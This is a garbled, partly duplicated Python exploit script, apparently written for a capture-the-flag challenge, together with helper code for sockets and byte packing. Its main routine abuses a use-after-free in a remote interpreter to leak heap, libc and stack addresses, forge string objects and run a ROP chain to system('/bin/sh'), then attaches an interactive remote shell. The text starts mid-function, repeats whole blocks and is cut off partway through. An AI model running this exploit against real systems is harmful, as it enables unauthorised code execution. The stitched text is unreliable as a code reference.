        # over the alphabet is long enough for the requested pattern.
        if length <= len(self.alphabet):
            self._seq = self.alphabet[:length]
        elif length <= len(self.alphabet) ** 2:
            self._seq = self._generate(2)[:length]
        elif length <= len(self.alphabet) ** 3:
            self._seq = self._generate(3)[:length]
        elif length <= len(self.alphabet) ** 4:
            self._seq = self._generate(4)[:length]
        else:
            raise Exception('Pattern length is way too large')

    def _generate(self, n):
        """Generate a De Bruijn sequence for subsequences of length n."""
        k = len(self.alphabet)
        a = [0] * k * n
        sequence = []

        def db(t, p):
            # Standard recursive De Bruijn construction via Lyndon words.
            if t > n:
                if n % p == 0:
                    sequence.extend(a[1:p + 1])
            else:
                a[t] = a[t - p]
                db(t + 1, p)
                for j in range(a[t - p] + 1, k):
                    a[t] = j
                    db(t + 1, t)
        db(1, 1)
        return ''.join(self.alphabet[i] for i in sequence)

    def bytes(self):
        """Return this sequence as bytes."""
        return e(self._seq)

    def __str__(self):
        """Return this sequence as string."""
        return self._seq

    @bytes_and_strings_are_cool
    def offset(self, needle):
        """Returns the index of 'needle' in this sequence.

        'needle' should be of type string or bytes. If an integer is provided
        it will be treated as 32-bit or 64-bit little endian number, depending
        on its bit length.

        Raises ValueError if the needle is absent or occurs more than once.
        """
        if isinstance(needle, int):
            if needle.bit_length() <= 32:
                needle = p32(needle)
            else:
                needle = p64(needle)
        # BUG FIX: the decorator converts str needles to bytes, and ints are
        # packed to bytes above, but self._seq is a str -- the original only
        # decoded in the int branch, so str/bytes needles raised TypeError.
        # Decode unconditionally before searching.
        needle = d(needle)
        idx = self._seq.index(needle)
        if self._seq[idx + len(needle):].find(needle) != -1:
            raise ValueError('Multiple occurrences found!')
        return idx
class Channel:
    """Convenience wrapper around a socket.

    Buffers incoming data internally and can pretty-print all traffic:
    outgoing data in one color, incoming in another, with non-printable
    bytes rendered as highlighted hex.
    """
    OUTGOING_COLOR = Term.COLOR_RED
    INCOMING_COLOR = Term.COLOR_BLUE

    def __init__(self, sock, verbose):
        # sock: a connected socket; verbose: echo traffic via _prettyprint().
        self._s = sock
        self._verbose = verbose
        self._buf = bytearray()  # received-but-not-yet-consumed bytes

    def _prettyprint(self, data, outgoing):
        """Prettyprint the given data.

        This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.
        Everything else is converted to hex, then printed in bold and underline for visibility.
        Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be
        detected in arbitrary binary streams.
        """
        TEXT = 0
        BINARY = 1
        # Heuristic thresholds: X = max length of a short text run that is
        # still rendered as hex when it follows binary data; Y and Z control
        # when the repeated-character tail of a long text run is split off.
        X = 4
        Y = 16
        Z = 2
        color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR
        # Tag every byte as printable text or binary.
        parts = []
        curr = ''  # NOTE(review): unused; kept as-is
        for b in data:
            if is_printable(b):
                parts.append((TEXT, b))
            else:
                parts.append((BINARY, b))
        # Merge consecutive bytes carrying the same tag into runs.
        i = 0
        mergedparts = []
        while i < len(parts):
            t = parts[i][0]
            arr = [parts[i][1]]
            j = i + 1
            while j < len(parts) and parts[j][0] == t:
                arr.append(parts[j][1])
                j += 1
            i = j
            extra = []
            # For a long text run that is not at the very end, split off a
            # long run of one repeated character near its tail and reclassify
            # it as binary (likely padding rather than real text).
            if t == TEXT and len(arr) > Y and i < len(parts) - 1:
                mid = len(arr) - Z - 1
                start, end = mid, mid
                char = arr[mid]
                while start >= 0 and arr[start] == char:
                    start -= 1
                while end < len(arr) and arr[end] == char:
                    end += 1
                if end - start >= Y + 2 and end < len(parts):
                    extra = arr[end:]
                    arr = arr[:end]
            mergedparts.append((t, bytes(arr)))
            if extra:
                mergedparts.append((BINARY, bytes(extra)))
        parts = mergedparts
        # Render: text runs in plain color, binary runs as bold/underlined hex.
        buf = ''
        last = None
        for tag, value in parts:
            # Short text sandwiched inside binary reads better as hex.
            if tag == TEXT and len(value) <= X and last == BINARY:
                tag = BINARY
            if tag == TEXT:
                buf += ansi(Term.CLEAR) + ansi(color)
            else:
                buf += ansi(color, Term.BOLD, Term.UNDERLINE)
                value = hexlify(value)
            buf += d(value)
            last = tag
        buf += ansi(Term.CLEAR)
        print(buf, end='')
        sys.stdout.flush()

    def setVerbose(self, verbose):
        """Set verbosity of this channel."""
        self._verbose = verbose

    def recv(self, n=4096):
        """Return up to n bytes of data from the remote end.

        Buffers incoming data internally.
        NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.
        """
        if len(self._buf) < n:
            buf = self._s.recv(65536)
            # Empty recv() result with an empty buffer means EOF.
            if not buf and not self._buf:
                raise DisconnectException('Server disconnected.')
            if self._verbose:
                self._prettyprint(buf, False)
            self._buf += buf
        # Serve at most n bytes from the internal buffer.
        buf = self._buf[:n]
        self._buf = self._buf[n:]
        return buf

    def recvn(self, n):
        """Return exactly n bytes of data from the remote end."""
        data = []
        while len(data) != n:
            data.append(self.recv(1))
        return b''.join(data)

    @bytes_and_strings_are_cool
    def recvtil(self, delim):
        """Read data from the remote end until delim is found in the data.

        The first occurrence of delim is included in the returned buffer.
        """
        buf = b''
        while not delim in buf:
            buf += self.recv(1)
        return buf

    def recvregex(self, regex):
        """Receive incoming data until it matches the given regex.

        Returns the match object.
        IMPORTANT: Since the data is coming from the network, it's usually
        a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function
        will return as soon as 'addr: 0xf' is read. Instead, make sure to
        end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\n'.
        """
        if isinstance(regex, str):
            regex = re.compile(regex)
        buf = ''
        match = None
        while not match:
            buf += d(self.recv(1))
            match = regex.search(buf)
        return match

    def recvline(self):
        """Receive and return a line from the remote end.

        The trailing newline character will be included in the returned buffer.
        """
        return self.recvtil('\n')

    def send(self, buf):
        """Send all data in buf to the remote end."""
        if self._verbose:
            self._prettyprint(buf, True)
        self._s.sendall(buf)

    def sendnum(self, n):
        """Send the string representation of n followed by a newline character."""
        self.sendline(str(n))

    @bytes_and_strings_are_cool
    def sendline(self, l):
        """Append a newline to l and send everything to the remote end."""
        self.send(l + b'\n')

    def interact(self):
        """Interact with the remote end: connect stdout and stdin to the socket."""
        self._verbose = False  # received data is written to stdout below anyway
        try:
            while True:
                # Block until local stdin or the socket is readable.
                available, _, _ = select.select([sys.stdin, self._s], [], [])
                for src in available:
                    if src == sys.stdin:
                        # read1(): return available bytes without blocking for more.
                        data = sys.stdin.buffer.read1(1024)
                        self.send(data)
                    else:
                        data = self.recv(4096)
                        sys.stdout.buffer.write(data)
                        sys.stdout.flush()
        except KeyboardInterrupt:
            return
        except DisconnectException:
            print_info('Server disconnected.')
            return
<|reserved_special_token_0|>
def send(b):
    """Shorthand for c.send(b) on the script-global channel `c`."""
    c.send(b)
def sendline(l):
    """Shorthand for c.sendline(l) on the script-global channel `c`."""
    c.sendline(l)
def sendnum(n):
    """Shorthand for c.sendnum(n) on the script-global channel `c`."""
    c.sendnum(n)
<|reserved_special_token_0|>
def recvtil(delim):
    """Shorthand for c.recvtil(delim) on the script-global channel `c`."""
    return c.recvtil(delim)
<|reserved_special_token_0|>
def interact():
    """Shorthand for c.interact() on the script-global channel `c`."""
    c.interact()
<|reserved_special_token_0|>
def readvar(name):
    """Read the raw printed value of variable `name` from the remote interpreter."""
    # Trigger a parse error ('Bad token') first to resynchronize on a
    # known prompt state before issuing the actual read.
    evl('=')
    recvtil('Bad token: 0-1\n> ')
    evl(name)
    response = recvtil('> ')
    # The first line of the response is the echoed value.
    return response.split(b'\n')[0]
def readintvar(name):
    """Read variable `name` from the remote interpreter as an int."""
    return int(d(readvar(name)))
<|reserved_special_token_0|>
def gc(remaining):
    """Trigger garbage collection"""
    # NOTE(review): shadows the stdlib `gc` module name; kept for callers.
    # Evaluates `remaining` throwaway expressions, which presumably fills the
    # interpreter's value slots until collection runs -- confirm on target.
    for i in range(remaining):
        evl('{}'.format(i))
def leak(addr, length):
    """Leaks process memory by abusing the UAF to temporarily inject a fake string."""
    # Heap address where the injected fake string body lands (heap_base is a
    # module global set by pwn()).
    fake_str_addr = heap_base + 176
    # Fake string object: length field followed by what is presumably a data
    # pointer (matches the target's string layout -- TODO confirm).
    fake_str = p64(length) + p64(addr)
    evl(b'l="' + fake_str + b'"')
    for i in range(15):
        evl('{}'.format(i))
    # Concatenate at the fake string's address, then read the result back.
    evl('a={}+x'.format(fake_str_addr))
    gc(16)
    return readstrvar('a')[0:length]
<|reserved_special_token_0|>
def pwn():
    """Run the exploit: leak heap, libc and stack, then ROP to system("/bin/sh")."""
    global heap_base
    recvtil('>')
    # Marker string reused as the rhs of later UAF reads/writes.
    evl('x="XXXXXXXXXXXXXXXX"')
    # Stage 1: leak the heap base.
    heap_base = heapleak()
    print_good('Heap base @ 0x{:x}'.format(heap_base))
    evl('"{}"'.format('A' * 256))
    gc(20 - 4)
    # Stage 2: scan leaked heap memory for freelist pointers into libc.
    heap_mem = leak(heap_base, 4096)
    for i in range(0, len(heap_mem) - 16, 8):
        flink = u64(heap_mem[i:i + 8])
        blink = u64(heap_mem[i + 8:i + 16])
        # Heuristic: pointer pairs far from the heap but inside the usual
        # x86-64 mmap range (0x7f00... - 0x7fff...) are taken as freelist links.
        if (abs(flink - heap_base) > 65536 and flink > 139637976727552 and
            flink < 140737488355328 and blink > 139637976727552 and blink <
            140737488355328):
            break
    else:
        print_bad('No freelist pointers found :(')
        return
    # Hard-coded offsets below are specific to the target's libc build.
    libc = flink - 3938600
    print_good('libc @ 0x{:x}'.format(libc))
    # Read libc's environ pointer to obtain a stack address.
    env_ptr = u64(leak2(libc + 3949728, 8))
    print_good('stack @ 0x{:x}'.format(env_ptr))
    system = libc + 288144
    bin_sh = libc + 1573123
    pop_rdi = libc + 142234
    pop_rsi = libc + 149637
    pop_rdx = libc + 7054
    add_rsp_0x48 = libc + 1006475
    print_good('/bin/sh @ 0x{:x}'.format(bin_sh))
    input_buf = env_ptr - 808
    print_good('input_buf @ 0x{:x}'.format(input_buf))
    ret_addr = env_ptr - 808 - 8
    print_good('return address @ 0x{:x}'.format(ret_addr))
    # Stage 3: heap grooming -- presumably shapes allocations so the fake
    # objects below land at predictable addresses (TODO confirm on target).
    evl('l.a=x')
    evl('h.a=x')
    evl('a.a=x')
    evl('b.a=x')
    evl('c.a=x')
    evl('d.a=x')
    evl('e.a=x')
    evl('f.a=x')
    for i in range(9):
        evl('"{}"'.format('A' * 16))
    evl('1337')
    for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:
        for p in ALPHABET:
            evl('{}.{}=x'.format(o, p))
    for i in range(6):
        evl('1337')
    for i in 'ghijk':
        evl('{}=x'.format(i))
    # Fake string with a huge length field (wraps when 16 is added).
    fake_str = p64(18446744073709551615 - 15 - (384 - 16)) + p64(71748523475265
        ) + b'D' * 240
    evl(b'n="' + fake_str + b'"')
    payload = b'\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 256) + p64(
        input_buf - 7)
    payload += b'\x00' * (384 - len(payload))
    evl(b'o="' + payload + b'"')
    fake_str_addr = heap_base + 7808
    evl('p=o+{}'.format(fake_str_addr))
    payload = b'A' * 256
    payload += p64(1) + p64(input_buf + 16 + 256 + 24) + p64(0)
    payload += p64(8) + p64(ret_addr)
    evl(payload)
    # Stage 4: read back 'p' to leak a pointer into the main binary.
    binary = readstrvar('p')
    binary = u64(binary) - 2769
    print_good('binary @ 0x{:x}'.format(binary))
    # 18446744073709551360 == 2**64 - 256: mask the low byte of input_buf.
    offset_to_ret = ret_addr - (input_buf & 18446744073709551360)
    print_good('offset to return address: 0x{:x}'.format(offset_to_ret))
    if offset_to_ret > 40 or offset_to_ret < 0:
        print_bad('Bad offset')
        return
    prop_name = p64(binary + 2761)[1]
    # The leaked address byte must form a valid identifier character.
    if prop_name < ord('A') or prop_name > ord('z'):
        print_bad('Bad propery name: {}'.format(prop_name))
        return
    prop_name = chr(prop_name)
    print_good('property name: {}'.format(prop_name))
    # Stage 5: place the ROP chain (newlines are forbidden by the protocol).
    payload = b'A' * 56
    payload += p64(pop_rdi)
    payload += p64(bin_sh)
    payload += p64(system)
    validate(payload, [b'\n'])
    evl(payload)
    evl('{}=42'.format(prop_name))
    # Pivot: overwrite the return address with an add-rsp gadget.
    payload = b'A' * offset_to_ret
    payload += p64(add_rsp_0x48)
    validate(payload, [b'\n'])
    evl(payload)
    time.sleep(0.5)
    interact()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def e(d):
    """Encode the given string instance using UTF-8 and return the bytes."""
    return bytes(d, 'UTF-8')
def d(d):
    """Decode the given bytes instance using UTF-8 and return the string."""
    return str(d, 'UTF-8')
def p32(d):
    """Return d packed as 32-bit unsigned integer (little endian).

    Raises struct.error if d does not fit into an unsigned 32-bit value.
    """
    return pack('<I', d)
def u32(d):
    """Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian).

    Raises struct.error unless d is exactly 4 bytes long.
    """
    return unpack('<I', d)[0]
def p64(d):
    """Return d packed as 64-bit unsigned integer (little endian).

    Raises struct.error if d does not fit into an unsigned 64-bit value.
    """
    return pack('<Q', d)
def u64(d):
    """Return the number represented by d when interpreted as a 64-bit unsigned integer (little endian).

    Raises struct.error unless d is exactly 8 bytes long.
    """
    return unpack('<Q', d)[0]
def print_good(msg):
    """Print a success message in bold."""
    prefix = ansi(Term.BOLD) + '[+] '
    print(prefix + msg + ansi(Term.CLEAR))
def print_bad(msg):
    """Print an error/failure message, colored magenta."""
    prefix = ansi(Term.COLOR_MAGENTA) + '[-] '
    print(prefix + msg + ansi(Term.CLEAR))
def print_info(msg):
    """Print a neutral informational message."""
    sys.stdout.write('[*] ' + msg + '\n')
def bytes_and_strings_are_cool(func):
    """Decorator to encode arguments that are string instances.

    Positional and keyword arguments of type str are UTF-8 encoded to bytes
    before the wrapped function is called; all other values pass through
    unchanged.
    """
    def inner(*args, **kwargs):
        nargs = tuple(e(arg) if isinstance(arg, str) else arg for arg in args)
        # BUG FIX: the original built nkwargs with map(lambda k, v: ..., kwargs),
        # but iterating a dict yields only keys, so the two-argument lambda
        # raised TypeError whenever a keyword argument was passed. Iterate
        # over the items instead.
        nkwargs = {k: e(v) if isinstance(v, str) else v for k, v in
                   kwargs.items()}
        return func(*nargs, **nkwargs)
    return inner
def validate(data, badchars):
    """Assert that no badchar occurs in data."""
    for bad in badchars:
        assert bad not in data
def is_printable(b):
    """Return true if the given byte is a printable ASCII character."""
    # Inlined equivalent of e(string.printable): membership test against the
    # UTF-8 encoding of string.printable (pure ASCII).
    return b in string.printable.encode('UTF-8')
def hexdump(data):
    """Return a hexdump of the given data. Similar to what `hexdump -C` produces."""
    # Characters rendered verbatim in the right-hand ASCII column.
    printable = (
        b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\|\'";:/?.,<>'
        )
    out = []
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        cells = ['{:02x}'.format(byte) for byte in chunk]
        left = ' '.join(cells[:8])
        right = ' '.join(cells[8:])
        text = ''.join(chr(byte) if byte in printable else '.' for byte in chunk)
        out.append('{:08x} {:23} {:23} |{}|'.format(off, left, right, text))
    return '\n'.join(out)
class Term:
    """ANSI terminal SGR escape-code fragments."""
    # Foreground color parameter codes.
    COLOR_BLACK = '30'
    COLOR_RED = '31'
    COLOR_GREEN = '32'
    COLOR_BROWN = '33'
    COLOR_BLUE = '34'
    COLOR_MAGENTA = '35'
    COLOR_CYAN = '36'
    COLOR_WHITE = '37'
    # Text attribute parameter codes.
    CLEAR = '0'  # reset all attributes
    UNDERLINE = '4'
    BOLD = '1'
    # CSI prefix (ESC '[') and SGR suffix that bracket the parameter list.
    ESCAPE_START = '\x1b['
    ESCAPE_END = 'm'
def ansi(*args):
    """Construct an ANSI terminal escape code from SGR parameter strings."""
    return '{}{}{}'.format(Term.ESCAPE_START, ';'.join(args), Term.ESCAPE_END)
class DisconnectException(Exception):
    """Raised when the remote end closes the connection."""
    pass
class Pattern:
    """De-Bruijn sequence generator.

    Produces a pattern in which every length-n subsequence is unique, so the
    position of a value observed in a crash can be recovered with offset().
    """
    alphabet = string.digits + string.ascii_letters

    def __init__(self, length):
        # Pick the smallest subsequence length n whose De Bruijn sequence
        # over the alphabet is long enough for the requested pattern.
        if length <= len(self.alphabet):
            self._seq = self.alphabet[:length]
        elif length <= len(self.alphabet) ** 2:
            self._seq = self._generate(2)[:length]
        elif length <= len(self.alphabet) ** 3:
            self._seq = self._generate(3)[:length]
        elif length <= len(self.alphabet) ** 4:
            self._seq = self._generate(4)[:length]
        else:
            raise Exception('Pattern length is way too large')

    def _generate(self, n):
        """Generate a De Bruijn sequence for subsequences of length n."""
        k = len(self.alphabet)
        a = [0] * k * n
        sequence = []

        def db(t, p):
            # Standard recursive De Bruijn construction via Lyndon words.
            if t > n:
                if n % p == 0:
                    sequence.extend(a[1:p + 1])
            else:
                a[t] = a[t - p]
                db(t + 1, p)
                for j in range(a[t - p] + 1, k):
                    a[t] = j
                    db(t + 1, t)
        db(1, 1)
        return ''.join(self.alphabet[i] for i in sequence)

    def bytes(self):
        """Return this sequence as bytes."""
        return e(self._seq)

    def __str__(self):
        """Return this sequence as string."""
        return self._seq

    @bytes_and_strings_are_cool
    def offset(self, needle):
        """Returns the index of 'needle' in this sequence.

        'needle' should be of type string or bytes. If an integer is provided
        it will be treated as 32-bit or 64-bit little endian number, depending
        on its bit length.

        Raises ValueError if the needle is absent or occurs more than once.
        """
        if isinstance(needle, int):
            if needle.bit_length() <= 32:
                needle = p32(needle)
            else:
                needle = p64(needle)
        # BUG FIX: the decorator converts str needles to bytes, and ints are
        # packed to bytes above, but self._seq is a str -- the original only
        # decoded in the int branch, so str/bytes needles raised TypeError.
        # Decode unconditionally before searching.
        needle = d(needle)
        idx = self._seq.index(needle)
        if self._seq[idx + len(needle):].find(needle) != -1:
            raise ValueError('Multiple occurrences found!')
        return idx
class Channel:
    """Convenience wrapper around a socket.

    Buffers incoming data internally and can pretty-print all traffic:
    outgoing data in one color, incoming in another, with non-printable
    bytes rendered as highlighted hex.
    """
    OUTGOING_COLOR = Term.COLOR_RED
    INCOMING_COLOR = Term.COLOR_BLUE

    def __init__(self, sock, verbose):
        # sock: a connected socket; verbose: echo traffic via _prettyprint().
        self._s = sock
        self._verbose = verbose
        self._buf = bytearray()  # received-but-not-yet-consumed bytes

    def _prettyprint(self, data, outgoing):
        """Prettyprint the given data.

        This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.
        Everything else is converted to hex, then printed in bold and underline for visibility.
        Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be
        detected in arbitrary binary streams.
        """
        TEXT = 0
        BINARY = 1
        # Heuristic thresholds: X = max length of a short text run that is
        # still rendered as hex when it follows binary data; Y and Z control
        # when the repeated-character tail of a long text run is split off.
        X = 4
        Y = 16
        Z = 2
        color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR
        # Tag every byte as printable text or binary.
        parts = []
        curr = ''  # NOTE(review): unused; kept as-is
        for b in data:
            if is_printable(b):
                parts.append((TEXT, b))
            else:
                parts.append((BINARY, b))
        # Merge consecutive bytes carrying the same tag into runs.
        i = 0
        mergedparts = []
        while i < len(parts):
            t = parts[i][0]
            arr = [parts[i][1]]
            j = i + 1
            while j < len(parts) and parts[j][0] == t:
                arr.append(parts[j][1])
                j += 1
            i = j
            extra = []
            # For a long text run that is not at the very end, split off a
            # long run of one repeated character near its tail and reclassify
            # it as binary (likely padding rather than real text).
            if t == TEXT and len(arr) > Y and i < len(parts) - 1:
                mid = len(arr) - Z - 1
                start, end = mid, mid
                char = arr[mid]
                while start >= 0 and arr[start] == char:
                    start -= 1
                while end < len(arr) and arr[end] == char:
                    end += 1
                if end - start >= Y + 2 and end < len(parts):
                    extra = arr[end:]
                    arr = arr[:end]
            mergedparts.append((t, bytes(arr)))
            if extra:
                mergedparts.append((BINARY, bytes(extra)))
        parts = mergedparts
        # Render: text runs in plain color, binary runs as bold/underlined hex.
        buf = ''
        last = None
        for tag, value in parts:
            # Short text sandwiched inside binary reads better as hex.
            if tag == TEXT and len(value) <= X and last == BINARY:
                tag = BINARY
            if tag == TEXT:
                buf += ansi(Term.CLEAR) + ansi(color)
            else:
                buf += ansi(color, Term.BOLD, Term.UNDERLINE)
                value = hexlify(value)
            buf += d(value)
            last = tag
        buf += ansi(Term.CLEAR)
        print(buf, end='')
        sys.stdout.flush()

    def setVerbose(self, verbose):
        """Set verbosity of this channel."""
        self._verbose = verbose

    def recv(self, n=4096):
        """Return up to n bytes of data from the remote end.

        Buffers incoming data internally.
        NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.
        """
        if len(self._buf) < n:
            buf = self._s.recv(65536)
            # Empty recv() result with an empty buffer means EOF.
            if not buf and not self._buf:
                raise DisconnectException('Server disconnected.')
            if self._verbose:
                self._prettyprint(buf, False)
            self._buf += buf
        # Serve at most n bytes from the internal buffer.
        buf = self._buf[:n]
        self._buf = self._buf[n:]
        return buf

    def recvn(self, n):
        """Return exactly n bytes of data from the remote end."""
        data = []
        while len(data) != n:
            data.append(self.recv(1))
        return b''.join(data)

    @bytes_and_strings_are_cool
    def recvtil(self, delim):
        """Read data from the remote end until delim is found in the data.

        The first occurrence of delim is included in the returned buffer.
        """
        buf = b''
        while not delim in buf:
            buf += self.recv(1)
        return buf

    def recvregex(self, regex):
        """Receive incoming data until it matches the given regex.

        Returns the match object.
        IMPORTANT: Since the data is coming from the network, it's usually
        a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function
        will return as soon as 'addr: 0xf' is read. Instead, make sure to
        end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\n'.
        """
        if isinstance(regex, str):
            regex = re.compile(regex)
        buf = ''
        match = None
        while not match:
            buf += d(self.recv(1))
            match = regex.search(buf)
        return match

    def recvline(self):
        """Receive and return a line from the remote end.

        The trailing newline character will be included in the returned buffer.
        """
        return self.recvtil('\n')

    def send(self, buf):
        """Send all data in buf to the remote end."""
        if self._verbose:
            self._prettyprint(buf, True)
        self._s.sendall(buf)

    def sendnum(self, n):
        """Send the string representation of n followed by a newline character."""
        self.sendline(str(n))

    @bytes_and_strings_are_cool
    def sendline(self, l):
        """Append a newline to l and send everything to the remote end."""
        self.send(l + b'\n')

    def interact(self):
        """Interact with the remote end: connect stdout and stdin to the socket."""
        self._verbose = False  # received data is written to stdout below anyway
        try:
            while True:
                # Block until local stdin or the socket is readable.
                available, _, _ = select.select([sys.stdin, self._s], [], [])
                for src in available:
                    if src == sys.stdin:
                        # read1(): return available bytes without blocking for more.
                        data = sys.stdin.buffer.read1(1024)
                        self.send(data)
                    else:
                        data = self.recv(4096)
                        sys.stdout.buffer.write(data)
                        sys.stdout.flush()
        except KeyboardInterrupt:
            return
        except DisconnectException:
            print_info('Server disconnected.')
            return
def telnet(shell='/bin/bash'):
    """Telnet emulation.

    Opens a PTY on the remote end and connects the master side to the socket.
    Then spawns a shell connected to the slave end and puts the controlling TTY
    on the local machine into raw mode.
    Result: Something similar to a telnet/(plaintext)ssh session.
    Vim, htop, su, less, etc. will work with this.
    !!! This function only works if the channel is connected to a shell !!!
    """
    assert sys.stdin.isatty()
    c.setVerbose(False)
    # Spawn a PTY-wrapped interactive shell on the remote side.
    code = "import pty; pty.spawn(['{}', '-i'])".format(shell)
    sendline('python -c "{}"; exit'.format(code))
    time.sleep(0.5)
    # Put the local TTY into raw mode so control sequences pass through;
    # the previous settings are restored after interact() returns.
    old_settings = termios.tcgetattr(sys.stdin.fileno())
    tty.setraw(sys.stdin)
    # Propagate the local terminal size to the remote PTY.
    cols, rows = os.get_terminal_size(sys.stdin.fileno())
    sendline('stty rows {} cols {}; echo READY'.format(rows, cols))
    recvtil('READY\r\n')  # skip the echoed command line ...
    recvtil('READY\r\n')  # ... then wait for the marker itself
    interact()
    termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)
def send(b):
    """Shorthand for c.send(b) on the script-global channel `c`."""
    c.send(b)
def sendline(l):
    """Shorthand for c.sendline(l) on the script-global channel `c`."""
    c.sendline(l)
def sendnum(n):
    """Shorthand for c.sendnum(n) on the script-global channel `c`."""
    c.sendnum(n)
<|reserved_special_token_0|>
def recvtil(delim):
    """Shorthand for c.recvtil(delim) on the script-global channel `c`."""
    return c.recvtil(delim)
def recvn(n):
    """Shorthand for c.recvn(n) on the script-global channel `c`."""
    return c.recvn(n)
def recvline():
    """Shorthand for c.recvline() on the script-global channel `c`."""
    return c.recvline()
def recvregex(r):
    """Shorthand for c.recvregex(r) on the script-global channel `c`."""
    return c.recvregex(r)
def interact():
    """Shorthand for c.interact() on the script-global channel `c`."""
    c.interact()
<|reserved_special_token_0|>
def evl(code):
    """Send one line of code to the remote interpreter for evaluation."""
    sendline(code)
def readvar(name):
    """Read the raw printed value of variable `name` from the remote interpreter."""
    # Trigger a parse error ('Bad token') first to resynchronize on a
    # known prompt state before issuing the actual read.
    evl('=')
    recvtil('Bad token: 0-1\n> ')
    evl(name)
    response = recvtil('> ')
    # The first line of the response is the echoed value.
    return response.split(b'\n')[0]
def readintvar(name):
    """Read variable `name` from the remote interpreter as an int."""
    return int(d(readvar(name)))
def readstrvar(name):
    """Read string variable `name`, stripping the surrounding quote characters."""
    return readvar(name)[1:-1]
def heapleak():
    """Free the lhs and rhs values during add_assign. ...

    Returns the page-aligned heap base leaked through the dangling value.
    """
    # Fill value slots so the vulnerable addition reuses freed chunks.
    for i in range(16):
        evl('{}'.format(i))
    evl('h=0+0')
    # 18446744073709547520 == 2**64 - 4096: mask off the page offset.
    return readintvar('h') & 18446744073709547520
def gc(remaining):
    """Trigger garbage collection"""
    # NOTE(review): shadows the stdlib `gc` module name; kept for callers.
    # Evaluates `remaining` throwaway expressions, which presumably fills the
    # interpreter's value slots until collection runs -- confirm on target.
    for i in range(remaining):
        evl('{}'.format(i))
def leak(addr, length):
    """Leaks process memory by abusing the UAF to temporarily inject a fake string."""
    # Heap address where the injected fake string body lands (heap_base is a
    # module global set by pwn()).
    fake_str_addr = heap_base + 176
    # Fake string object: length field followed by what is presumably a data
    # pointer (matches the target's string layout -- TODO confirm).
    fake_str = p64(length) + p64(addr)
    evl(b'l="' + fake_str + b'"')
    for i in range(15):
        evl('{}'.format(i))
    # Concatenate at the fake string's address, then read the result back.
    evl('a={}+x'.format(fake_str_addr))
    gc(16)
    return readstrvar('a')[0:length]
def leak2(addr, length):
    """Same as above, but different offsets..."""
    # Same technique as leak(), with the fake string landing further into
    # the heap and without the trailing gc() step.
    fake_str_addr = heap_base + 368
    fake_str = p64(length) + p64(addr)
    evl(b'l="' + fake_str + b'"')
    for i in range(12):
        evl('{}'.format(i))
    evl('a={}+x'.format(fake_str_addr))
    return readstrvar('a')[0:length]
def pwn():
    """Run the exploit: leak heap, libc and stack, then ROP to system("/bin/sh")."""
    global heap_base
    recvtil('>')
    # Marker string reused as the rhs of later UAF reads/writes.
    evl('x="XXXXXXXXXXXXXXXX"')
    # Stage 1: leak the heap base.
    heap_base = heapleak()
    print_good('Heap base @ 0x{:x}'.format(heap_base))
    evl('"{}"'.format('A' * 256))
    gc(20 - 4)
    # Stage 2: scan leaked heap memory for freelist pointers into libc.
    heap_mem = leak(heap_base, 4096)
    for i in range(0, len(heap_mem) - 16, 8):
        flink = u64(heap_mem[i:i + 8])
        blink = u64(heap_mem[i + 8:i + 16])
        # Heuristic: pointer pairs far from the heap but inside the usual
        # x86-64 mmap range (0x7f00... - 0x7fff...) are taken as freelist links.
        if (abs(flink - heap_base) > 65536 and flink > 139637976727552 and
            flink < 140737488355328 and blink > 139637976727552 and blink <
            140737488355328):
            break
    else:
        print_bad('No freelist pointers found :(')
        return
    # Hard-coded offsets below are specific to the target's libc build.
    libc = flink - 3938600
    print_good('libc @ 0x{:x}'.format(libc))
    # Read libc's environ pointer to obtain a stack address.
    env_ptr = u64(leak2(libc + 3949728, 8))
    print_good('stack @ 0x{:x}'.format(env_ptr))
    system = libc + 288144
    bin_sh = libc + 1573123
    pop_rdi = libc + 142234
    pop_rsi = libc + 149637
    pop_rdx = libc + 7054
    add_rsp_0x48 = libc + 1006475
    print_good('/bin/sh @ 0x{:x}'.format(bin_sh))
    input_buf = env_ptr - 808
    print_good('input_buf @ 0x{:x}'.format(input_buf))
    ret_addr = env_ptr - 808 - 8
    print_good('return address @ 0x{:x}'.format(ret_addr))
    # Stage 3: heap grooming -- presumably shapes allocations so the fake
    # objects below land at predictable addresses (TODO confirm on target).
    evl('l.a=x')
    evl('h.a=x')
    evl('a.a=x')
    evl('b.a=x')
    evl('c.a=x')
    evl('d.a=x')
    evl('e.a=x')
    evl('f.a=x')
    for i in range(9):
        evl('"{}"'.format('A' * 16))
    evl('1337')
    for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:
        for p in ALPHABET:
            evl('{}.{}=x'.format(o, p))
    for i in range(6):
        evl('1337')
    for i in 'ghijk':
        evl('{}=x'.format(i))
    # Fake string with a huge length field (wraps when 16 is added).
    fake_str = p64(18446744073709551615 - 15 - (384 - 16)) + p64(71748523475265
        ) + b'D' * 240
    evl(b'n="' + fake_str + b'"')
    payload = b'\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 256) + p64(
        input_buf - 7)
    payload += b'\x00' * (384 - len(payload))
    evl(b'o="' + payload + b'"')
    fake_str_addr = heap_base + 7808
    evl('p=o+{}'.format(fake_str_addr))
    payload = b'A' * 256
    payload += p64(1) + p64(input_buf + 16 + 256 + 24) + p64(0)
    payload += p64(8) + p64(ret_addr)
    evl(payload)
